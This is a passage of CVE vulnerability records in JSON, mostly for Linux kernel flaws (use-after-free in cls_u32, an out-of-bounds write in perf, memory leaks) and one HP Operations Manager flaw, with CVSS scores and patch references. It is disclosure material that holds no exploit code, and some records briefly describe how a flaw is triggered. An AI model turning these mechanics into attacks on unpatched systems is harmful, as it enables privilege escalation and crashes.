        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c52c6bb831f6335c176a0fc7214e26f43adbd11"
        },
        {
          "url": "https://vuldb.com/?id.211021"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel IPv6 ipv6_renew_options memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3524",
    "datePublished": "2022-10-16T00:00:00",
    "dateReserved": "2022-10-16T00:00:00",
    "dateUpdated": "2024-08-03T01:14:02.569Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-3609
Vulnerability from cvelistv5
Published
2023-07-21 20:47
Modified
2024-08-02 07:01
Severity
Summary
Use-after-free in Linux kernel's net/sched: cls_u32 component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:01:56.672Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=04c55383fa5689357bcdd2c8036725a55ed632bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/04c55383fa5689357bcdd2c8036725a55ed632bc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230818-0005/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5480"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.4",
              "status": "affected",
              "version": "4.14",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2023-06-09T10:40:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eA use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_u32 component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eIf tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.\u003c/p\u003e"
            }
          ],
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_u32 component can be exploited to achieve local privilege escalation.\n\nIf tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.\n\nWe recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-07-21T20:47:12.172Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=04c55383fa5689357bcdd2c8036725a55ed632bc"
        },
        {
          "url": "https://kernel.dance/04c55383fa5689357bcdd2c8036725a55ed632bc"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230818-0005/"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5480"
        },
        {
          "url": "http://packetstormsecurity.com/files/175072/Kernel-Live-Patch-Security-Notice-LSN-0098-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
        },
        {
          "url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_u32 component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-3609",
    "datePublished": "2023-07-21T20:47:12.172Z",
    "dateReserved": "2023-07-10T20:52:53.660Z",
    "dateUpdated": "2024-08-02T07:01:56.672Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3545
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel IPsec nfp_cppcore.c area_cache_get use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:01.597Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211045"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20221223-0003/"
          },
          {
            "name": "DSA-5324",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5324"
          },
          {
            "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
          },
          {
            "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a"
        },
        {
          "url": "https://vuldb.com/?id.211045"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20221223-0003/"
        },
        {
          "name": "DSA-5324",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2023/dsa-5324"
        },
        {
          "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
        },
        {
          "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
        }
      ],
      "title": "Linux Kernel IPsec nfp_cppcore.c area_cache_get use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3545",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:01.597Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-5717
Vulnerability from cvelistv5
Published
2023-10-25 12:55
Modified
2024-08-02 08:07
Severity
Summary
Out-of-bounds write in Linux kernel's Linux Kernel Performance Events (perf) component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T08:07:32.716Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/events?id=32671e3799ca2e4590773fd0e63aaa4229e50c06"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/32671e3799ca2e4590773fd0e63aaa4229e50c06"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.6",
              "status": "affected",
              "version": "4.4",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Budimir Markovic"
        }
      ],
      "datePublic": "2023-10-19T08:09:42+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A heap out-of-bounds write vulnerability in the Linux kernel\u0027s Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.\n\nIf perf_read_group() is called while an event\u0027s sibling_list is smaller than its child\u0027s sibling_list, it can increment or write to memory locations outside of the allocated buffer.\n\nWe recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-787",
              "description": "CWE-787 Out-of-bounds Write",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-10-25T12:55:06.871Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/events?id=32671e3799ca2e4590773fd0e63aaa4229e50c06"
        },
        {
          "url": "https://kernel.dance/32671e3799ca2e4590773fd0e63aaa4229e50c06"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00005.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Out-of-bounds write in Linux kernel\u0027s Linux Kernel Performance Events (perf) component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-5717",
    "datePublished": "2023-10-25T12:55:06.871Z",
    "dateReserved": "2023-10-23T10:49:09.250Z",
    "dateUpdated": "2024-08-02T08:07:32.716Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-2649
Vulnerability from cvelistv5
Published
2014-10-10 01:00
Modified
2024-08-06 10:21
Severity
Summary
Unspecified vulnerability in HP Operations Manager 9.20 on UNIX allows remote attackers to execute arbitrary code via unknown vectors.
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:21:35.723Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "SSRT101727",
            "tags": [
              "vendor-advisory",
              "x_refsource_HP",
              "x_transferred"
            ],
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472866"
          },
          {
            "name": "HPSBMU03127",
            "tags": [
              "vendor-advisory",
              "x_refsource_HP",
              "x_transferred"
            ],
            "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472866"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-10-08T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Unspecified vulnerability in HP Operations Manager 9.20 on UNIX allows remote attackers to execute arbitrary code via unknown vectors."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-10-10T01:57:01",
        "orgId": "74586083-13ce-40fd-b46a-8e5d23cfbcb2",
        "shortName": "hp"
      },
      "references": [
        {
          "name": "SSRT101727",
          "tags": [
            "vendor-advisory",
            "x_refsource_HP"
          ],
          "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472866"
        },
        {
          "name": "HPSBMU03127",
          "tags": [
            "vendor-advisory",
            "x_refsource_HP"
          ],
          "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472866"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "hp-security-alert@hp.com",
          "ID": "CVE-2014-2649",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Unspecified vulnerability in HP Operations Manager 9.20 on UNIX allows remote attackers to execute arbitrary code via unknown vectors."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "SSRT101727",
              "refsource": "HP",
              "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472866"
            },
            {
              "name": "HPSBMU03127",
              "refsource": "HP",
              "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472866"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "74586083-13ce-40fd-b46a-8e5d23cfbcb2",
    "assignerShortName": "hp",
    "cveId": "CVE-2014-2649",
    "datePublished": "2014-10-10T01:00:00",
    "dateReserved": "2014-03-24T00:00:00",
    "dateUpdated": "2024-08-06T10:21:35.723Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3635
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel IPsec idt77252.c tst_timer use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.270Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=3f4093e2bf4673f218c0bf17d8362337c400e77b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211934"
          },
          {
            "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function tst_timer of the file drivers/atm/idt77252.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. VDB-211934 is the identifier assigned to this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-11-01T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=3f4093e2bf4673f218c0bf17d8362337c400e77b"
        },
        {
          "url": "https://vuldb.com/?id.211934"
        },
        {
          "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
        }
      ],
      "title": "Linux Kernel IPsec idt77252.c tst_timer use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3635",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.270Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-10872
Vulnerability from cvelistv5
Published
2018-07-10 19:00
Modified
2024-08-05 07:46
Severity
Summary
A flaw was found in the way the Linux kernel handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, processor does not deliver interrupts and exceptions, they are delivered once the first instruction after the stack switch is executed. An unprivileged system user could use this flaw to crash the system kernel resulting in DoS. This CVE-2018-10872 was assigned due to regression of CVE-2018-8897 in Red Hat Enterprise Linux 6.10 GA kernel. No other versions are affected by this CVE.
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T07:46:47.310Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "RHSA-2018:2164",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2018:2164"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.oracle.com/security-alerts/cpujul2020.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10872"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-07-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A flaw was found in the way the Linux kernel handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, processor does not deliver interrupts and exceptions, they are delivered once the first instruction after the stack switch is executed. An unprivileged system user could use this flaw to crash the system kernel resulting in DoS. This CVE-2018-10872 was assigned due to regression of CVE-2018-8897 in Red Hat Enterprise Linux 6.10 GA kernel. No other versions are affected by this CVE."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-250",
              "description": "CWE-250",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-07-15T02:22:56",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "RHSA-2018:2164",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2018:2164"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.oracle.com/security-alerts/cpujul2020.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-10872"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2018-10872",
    "datePublished": "2018-07-10T19:00:00",
    "dateReserved": "2018-05-09T00:00:00",
    "dateUpdated": "2024-08-05T07:46:47.310Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-1389
Vulnerability from cvelistv5
Published
2009-06-16 23:00
Modified
2024-08-07 05:13
Severity
Summary
Buffer overflow in the RTL8169 NIC driver (drivers/net/r8169.c) in the Linux kernel before 2.6.30 allows remote attackers to cause a denial of service (kernel memory corruption and crash) via a long packet.
References
URLTags
http://secunia.com/advisories/35265third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2009/dsa-1865vendor-advisory, x_refsource_DEBIAN
http://wiki.rpath.com/Advisories:rPSA-2009-0111x_refsource_CONFIRM
http://secunia.com/advisories/37298third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/36131third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2009/06/10/1mailing-list, x_refsource_MLIST
https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01048.htmlvendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-security-announce/2010-07/msg00006.htmlvendor-advisory, x_refsource_SUSE
https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01094.htmlvendor-advisory, x_refsource_FEDORA
http://secunia.com/advisories/37471third-party-advisory, x_refsource_SECUNIA
http://support.citrix.com/article/CTX123453x_refsource_CONFIRM
https://exchange.xforce.ibmcloud.com/vulnerabilities/51051vdb-entry, x_refsource_XF
http://www.mandriva.com/security/advisories?name=MDVSA-2009:148vendor-advisory, x_refsource_MANDRIVA
http://marc.info/?l=linux-netdev&m=123462461713724&w=2mailing-list, x_refsource_MLIST
http://www.debian.org/security/2009/dsa-1844vendor-advisory, x_refsource_DEBIAN
http://www.ubuntu.com/usn/usn-807-1vendor-advisory, x_refsource_UBUNTU
http://www.vmware.com/security/advisories/VMSA-2009-0016.htmlx_refsource_CONFIRM
http://www.redhat.com/support/errata/RHSA-2009-1193.htmlvendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/35566third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1023507vdb-entry, x_refsource_SECTRACK
http://www.redhat.com/support/errata/RHSA-2009-1157.htmlvendor-advisory, x_refsource_REDHAT
